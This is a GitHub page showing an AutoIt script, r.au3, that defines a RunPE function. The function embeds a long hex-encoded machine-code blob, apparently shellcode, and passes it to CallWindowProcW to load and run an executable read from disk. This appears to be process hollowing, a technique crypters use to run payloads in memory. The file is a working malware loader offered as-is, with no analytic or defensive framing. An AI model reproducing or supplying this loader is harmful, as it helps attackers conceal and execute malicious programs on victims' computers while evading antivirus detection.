-
Notifications
You must be signed in to change notification settings - Fork 0
/
r.au3
executable file
·38 lines (24 loc) · 3.27 KB
/
r.au3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
;Use..............: RunPE(Path,$binary)
$yourfile="o:\amur\VirtualBox\SHARED FOLDER\1.exe"
$binary=fileread($yourfile)
RunPE($yourfile,$binary)
Func RunPE($path,$filebin)
local $ASM = "0x60E84E0000006B00650072006E0065006C00330032000000 6E00740064006C006C00000000000000000000000000000000 00000000000000000000000000000000000000000000000000 000000000000000000005B8BFC6A42E8BB0300008B54242889 118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E 6A3CE89D0300006A2268F4000000E8910300006A266A24E888 0300006A2A6A40E87F030000"
$ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C 0300008B09C701440000006A12E84D030000685BE814CF51E8 790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF 31FFD06A12E823030000685BE814CF51E84F0300006A1EE811 0300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200 008B0968F80000005751FFD06A00E8E80200006888FEB31651 E8140300006A2EE8D60200"
$ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A00 6A046A006A006A006A00FF31FFD06A12E8A902000068D03710 F251E8D50200006A22E8970200008B116A2EE88E0200008B09 FF7234FF31FFD06A00E87E020000689C951A6E51E8AA020000 6A22E86C0200008B118B396A2EE8610200008B096A40680030 0000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E 0200008B396A3EE8350200"
$ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF7754 56FF7034FF316A00E81002000068A16A3DD851E83C02000083 C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8 E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8 CE010000C70100000000B8280000006A36E8BC010000F7216A 1EE8B30100008B118B523C81C2F800000003D06A3EE89F0100 0003116A26E8960100006A"
$ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40C FFD06A26E8730100008B398B098B71146A3EE8650100000331 6A26E85C0100008B098B510C6A22E8500100008B090351346A 46E8440100008BC16A2EE83B0100008B0950FF77105652FF31 6A00E82A01000068A16A3DD851E85601000083C40CFFD06A36 E8130100008B1183C20189116A3AE8050100008B093BCA0F85 33FFFFFF6A32E8F4000000"
$ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100 006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD0 6A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400 000083C6086A2EE89D0000008B116A46E894000000516A0457 56FF326A00E88600000068A16A3DD851E8B200000083C40CFF D06A22E86F0000008B098B51280351346A32E8600000008B09 81C1B000000089116A00E8"
$ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A 2EE8340000008B09FF32FF7104FFD06A00E82400000068883F 4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8 040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CA AF9151E81E0000006A406800100000FF7424186A00FFD0FF74 2414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E8 4B00000083C408FF742404"
$ASM &= "FFD0FF74240850E83800000083C408C355525153565733C064 8B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B 7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B 6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE3 30498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B 7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F 5E5B595A5DC3C300000000"
Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
Local $binBuffer=DllStructCreate("byte[" & BinaryLen($filebin) & "]")
DllStructSetData($BufferASM, 1, $ASM)
DllStructSetData($binBuffer, 1, $filebin)
Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
"ptr", DllStructGetPtr($BufferASM), _
"wstr", ($Path), _
"ptr", DllStructGetPtr($binBuffer), _
"int", 0, _
"int", 0)
EndFunc